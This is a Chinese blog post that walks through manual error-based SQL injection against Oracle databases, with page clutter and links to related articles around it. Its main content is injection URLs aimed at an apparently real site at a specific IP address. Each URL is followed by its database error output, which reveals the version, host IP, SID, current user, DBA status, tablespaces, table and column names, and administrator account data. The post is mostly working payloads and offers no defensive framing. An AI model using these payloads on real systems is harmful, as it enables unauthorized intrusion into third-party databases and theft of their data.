oracle手注,oracle手注

于 2021-04-10 16:45:45 发布
阅读量124 收藏
点赞数
文章标签: oracle手注

报错注入:

【1】爆版本号

方法一:

例子:http://210.35.35.70:82/Book.aspx?id=0199332841

爆版本号:http://210.35.35.70:82/Book.aspx?id=0199332841' || utl_inaddr.get_host_name(

(select banner from v$version where rownum=1)) --

报错信息:ORA-29257: 未知的主机 Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production

ORA-06512: 在 "SYS.UTL_INADDR", line 4

ORA-06512: 在 "SYS.UTL_INADDR", line 35

ORA-06512: 在 line 1

方法二:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(

banner,chr(32),chr(58))

from sys.v_$version where rownum=1)||chr(62))) from du) --

报错信息:ORA-31011: XML 语法分析失败

ORA-19202: XML 处理

LPX-00110: Warning: 无效的 QName "::Oracle:Database:11g:Enterprise:Edition:Release:11.1.0.7.0:-:Production" (不是名称)

Error at line 1

时出错

ORA-06512: 在 "SYS.XMLTYPE", line 310

ORA-06512: 在 line 1

方法三:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,

(select banner from v$version where rownum=1)) –

报错信息:ORA-20000: Oracle Text 错误:

DRG-11701: 主题词表 Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production 不存在

ORA-06512: 在 "CTXSYS.DRUE", line 160

ORA-06512: 在 "CTXSYS.DRITHSX", line 538

ORA-06512: 在 line 1

【2】爆ip:

只有这种方法有效:

http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(select utl_inaddr.get_host_address from dual)) --

报错信息:ORA-20000: Oracle Text 错误:

DRG-11701: 主题词表 210.35.35.10 不存在

ORA-06512: 在 "CTXSYS.DRUE", line 160

ORA-06512: 在 "CTXSYS.DRITHSX", line 538

ORA-06512: 在 line 1

类似的:

(1)可以爆日志的位置:

(select member from v$logfile where rownum=1)

报错信息:ORA-20000: Oracle Text 错误:

DRG-11701: 主题词表 F:\APP\ADMINISTRATOR\ORADATA\ORCL\REDO03.LOG 不存在

ORA-06512: 在 "CTXSYS.DRUE", line 160

ORA-06512: 在 "CTXSYS.DRITHSX", line 538

ORA-06512: 在 line 1

(2)可以爆sid:(select instance_name from v$instance)

报错信息:ORA-20000: Oracle Text 错误:

DRG-11701: 主题词表 orcl 不存在

ORA-06512: 在 "CTXSYS.DRUE", line 160

ORA-06512: 在 "CTXSYS.DRITHSX", line 538

ORA-06512: 在 line 1

(3)可以爆当前用户信息:(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)

报错信息:ORA-20000: Oracle Text 错误:

DRG-11701: 主题词表 NCHD 不存在

ORA-06512: 在 "CTXSYS.DRUE", line 160

ORA-06512: 在 "CTXSYS.DRITHSX", line 538

ORA-06512: 在 line 1

(4)判断是不是dba:(select SYS_CONTEXT ('USERENV', 'ISDBA') from dual)

报错信息:ORA-20000: Oracle Text 错误:

DRG-11701: 主题词表 FALSE 不存在

ORA-06512: 在 "CTXSYS.DRUE", line 160

ORA-06512: 在 "CTXSYS.DRITHSX", line 538

ORA-06512: 在 line 1

【3】爆表空间(oracle没有数据库这个概念,代替的是:表空间):http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT TABLESPACE_NAME FROM(SELECT DBA_TABLESPACES.TABLESPACE_NAME, ROWNUM AS CON FROM DBA_TABLESPACES WHERE ROWNUM <= 1)WHERE CON >=1)) --

报错信息:ORA-20000: Oracle Text 错误:

DRG-11701: 主题词表 SYSTEM 不存在

ORA-06512: 在 "CTXSYS.DRUE", line 160

ORA-06512: 在 "CTXSYS.DRITHSX", line 538

ORA-06512: 在 line 1

PS:想要查其他的表空间,只要把数字改一改就好,比如想查第二个表空间则这么写:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT TABLESPACE_NAME FROM(SELECT DBA_TABLESPACES.TABLESPACE_NAME, ROWNUM AS CON FROM DBA_TABLESPACES WHERE ROWNUM <= 2)WHERE CON >=2)) --

报错信息:ORA-20000: Oracle Text 错误:

DRG-11701: 主题词表 SYSAUX 不存在

ORA-06512: 在 "CTXSYS.DRUE", line 160

ORA-06512: 在 "CTXSYS.DRITHSX", line 538

ORA-06512: 在 line 1

(Ps:表空间:创建表空间会在物理磁盘上建立一个数据文件,作为数据库对象(用户、表、存储过程等等)的物理存储空间;

用户:创建用户必须为其指定表空间,如果没有显性指定默认表空间,则指定为users表空间;创建用户后,可以在用户上,创建表、存储过程等等其他数据库对象;

表:是数据记录的集合;

创建过程: 表空间--->用户--->表;

所属关系: 表空间 包含 用户 包含 表;)

0818b9ca8b590ca3270a3433284dd417.png select default_tablespace, username from dba_user 这个sql指令会查出表空间对应的用户 【4】查表:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT table_name FROM(SELECT user_tables.table_name, ROWNUM AS CON FROM user_tables WHERE ROWNUM <= 1)WHERE CON >=1)) – 报错信息:ORA-20000: Oracle Text 错误: DRG-11701: 主题词表 QKDDK_140923 不存在 ORA-06512: 在 "CTXSYS.DRUE", line 160 ORA-06512: 在 "CTXSYS.DRITHSX", line 538 ORA-06512: 在 line 1 (Ps:查第二个表就是这么写:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT table_name FROM(SELECT user_tables.table_name, ROWNUM AS CON FROM user_tables WHERE ROWNUM <= 2)WHERE CON >=2)) – 【5】查 “ZD_DW” 表字段:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT column_name FROM(SELECT user_tab_columns.column_name, ROWNUM AS CON FROM user_tab_columns WHERE ROWNUM <= 1 and table_name='ZD_DW')WHERE CON >=1)) – 报错信息:ORA-20000: Oracle Text 错误: DRG-11701: 主题词表 F1 不存在 ORA-06512: 在 "CTXSYS.DRUE", line 160 ORA-06512: 在 "CTXSYS.DRITHSX", line 538 ORA-06512: 在 line 1 【6】查数据:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT ADMINS_NAME FROM(SELECT TT_ADMINS.ADMINS_NAME, ROWNUM AS CON FROM TT_ADMINS WHERE ROWNUM <= 1)WHERE CON >=1)) – 报错信息:ORA-20000: Oracle Text 错误: DRG-11701: 主题词表 TTADMINS 不存在 ORA-06512: 在 "CTXSYS.DRUE", line 160 ORA-06512: 在 "CTXSYS.DRITHSX", line 538 ORA-06512: 在 line 1 附: ORACLE中查询第n条到第m条的数据记录的方法: SELECT * FROM ( SELECT 表名.*, ROWNUM AS CON FROM 表名 WHERE ROWNUM <= M AND 其它查询条件 ORDER BY 排序条件 ) WHERE CON >=N;

鲸商
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle select if判断_关于学习Oracle注入
weixin_39722025的博客
12-06 1818
更多全球网络安全资讯尽在邑安全www.eansec.comOracle注入学习最近学习过程中碰到了有使用oracle数据库的站,但是最后没有拿下来 太菜了ORZ所以学习了一下oracle注入,oracle其他的洞还在学习中ing...Oracle数据库Oracle安装先来了解一下oracle数据库:Oracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文...
oracle hint 谓词推进,oracle常见hint
weixin_26870313的博客
04-14 877
与优化器模式相关的hint1.1 /*+ all_rows */ 让优化器启动CBO1.2 /*+ first_rows(n)*/优化器启动CBO,选择会快返回前n行数据的执行计划。与first_rows_n不同,first_rows_n n只能为1,10,100,1000.1.3 /*+ rule */ 启动RBO,与其他hint连用,其他hint一般会失效。与表及索引访问相关的hint2.1 ...
oracle 无效的数字_oracle报错注入payload收集
weixin_29824417的博客
01-23 472
“还是前两天的众测,遇到了一处oracle注入。于是趁有时间于是收集一些oracle报错注入的payload,以备不时之需”01漏洞确认当输入一个单引号时,系统报错:当输入两个单引号时,系统返回正常信息。很确定这里存在sql注入,但是由于涉及到一些绕waf的事情,sqlmap没法直接跑出结果,只能手工注入了。oracle注入我接触的少,于是收集一些oracle报错注入的payload,以...
Oracle 全文检索 中文检索
IT天空-我是一滴雨水
09-02 1283
设置过程 1.首先,检查你的数据库是否安装了intermedia 这可以通过检查是否有ctxsys用户和ctxapp角色(role). 如果没有这个用户和角色,意味着你的数据库创建时未安装intermedia功能。 你必须修改数据库以安装这项功能。  修改过程:       运行 $ORACLE_HOME/bin/dbassist, 选择'modify databas
oracle创建全文检索--多列
chen_815的专栏
04-25 3081
表字段 ID VARCHAR2(30) ID TITLE VARCHAR2(256) 标题 SUB_TITLE VARCHAR2(256) 副标题 CONTENT CLOB 内容 SUMMARY CLOB 简介 AUTHOR VARCHAR2(256) 作者 SOURCE VARCHAR2(
创建实例时,机器名过长
wonder的地下室
01-04 1124
创建实例时,创建到database Vault组件时,报错,查看日志,ORA-29257: 未知的主机 发现是机器名设置的过长,datavault自动进行了截取15位,为解决这个问题,在etc/hosts下增加了映射。 
Oracle系统权限和对象权限
03-05
- **注**:`CREATE ANY SQLPROFILE`、`ALTER ANY SQLPROFILE`和`DROP ANY SQLPROFILE`已被弃用,建议使用`ADMINISTER SQL MANAGEMENT OBJECT`。 3. **集群(Clusters)** - `CREATE CLUSTER`:允许在受让人模式下...
Oracle跨平台轻量开发工具
08-10
Oracle SQL Handler, 是专为 Oracle 数据库开发人员及操作人员精心打造的一款 Oracle 开发工具(客户端工具)。国产原创, 精品奉献, 无序列号限制, 仅凭使用满意度随意赞助就可永久使用! 其优点特点如下: (1...
oracle日常巡检命令集合
01-24
注:`STATUS`显示为空表示正常。 1.3. 检查Oracle表空间的状态 使用命令`select tablespace_name, status from dba_tablespaces;`可以检查Oracle表空间的状态。输出结果中`STATUS`应该都为`ONLINE`。 1.4. 检查...
Windows Server2022安装Oracle 19c详细教程生产环境.pdf
06-09
Windows Server2022安装Oracle 19c详细教程生产环境
OracleERP数据转换论
03-04
OracleERP方法体系中属实施管理范畴的是AIM(ApplicationImplementationMethod),从下图AIM流程中我们可以看到系统时间轴上共分为六个阶段:◆需求定义阶段(Definition)◆业务分析阶段(OperationsAnalysis)◆...
oracle手注
一个码农的笔记
10-09 2388
报错注入: 【1】爆版本号 方法一: 例子:http://210.35.35.70:82/Book.aspx?id=0199332841 爆版本号:http://210.35.35.70:82/Book.aspx?id=0199332841' || utl_inaddr.get_host_name((select banner from v$version where rownum=1))
ORACLE 常见错误及解决汇总 ORA-20000 ORA-03113 ORA-14452 ORA-08103
wekily的专栏
12-30 3万+
ORA-20000 ORA-03113 ORA-14452 ORA-08103
oracle全连接索引无效,ORA-20000无效索引故障解决方案
weixin_36282765的博客
04-04 1708
今天,开发同学反馈,数据库Oracle链接过一段时间就会断掉,他问是不是因为IIS和数据库不在一个网段的原因,要长连接才可以吧?于是,登录这套数据库的EMCC 12C监控里发现 有2个SQL 执行了很长时间 都失败,如下图查看alert日志文件,发现有以下报错,如下图,查看上图所示的那个trc文件,如下图操作,发现里面的报错 为ORA-20000,即用户对应的表下有一个索引不可用,见下图所示,Al...
oracle -20000,ORACLE10G ORA-20000问题处理详解
weixin_30284125的博客
04-03 1930
问题现象:数据库库出现ORA-20000错误:Errors in file /home/oracle/admin/zjindex/bdump/zjindex2_j002_615322.trc:ORA-12012: error on auto execute of job 8887ORA-20000: ORA-20000: Content of the tablespace specified is...
Oracle存储过程报ORA-20000错误
热门推荐
a475952074的博客
04-23 4万+
在输出时,控制输出结果的缓冲大小由DBMS_OUTPUT.ENABLE控制,buffer size默认为20000,每行最大的限制是32k,后面的一个例子是用来说明存储过程是在缓存了所有数据后才将结果返回。所以当我们使用游标进行输出时,如果结果很多,将会超过这个值报ORA-20000, ORU-10027: Buffer overflow, limit of &lt;buf_limit&gt; b...
方案-基于云架构的校园信息化建设方案.pdf
最新发布
07-29
方案-基于云架构的校园信息化建设方案.pdf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值